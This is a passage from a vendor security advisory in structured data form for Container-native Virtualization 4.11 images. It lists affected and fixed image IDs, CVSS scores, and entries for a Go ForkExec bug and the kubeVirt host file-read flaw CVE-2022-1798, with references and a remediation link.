"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 4.8, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: syscall: don't close fd 0 on ForkExec error", }, { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", 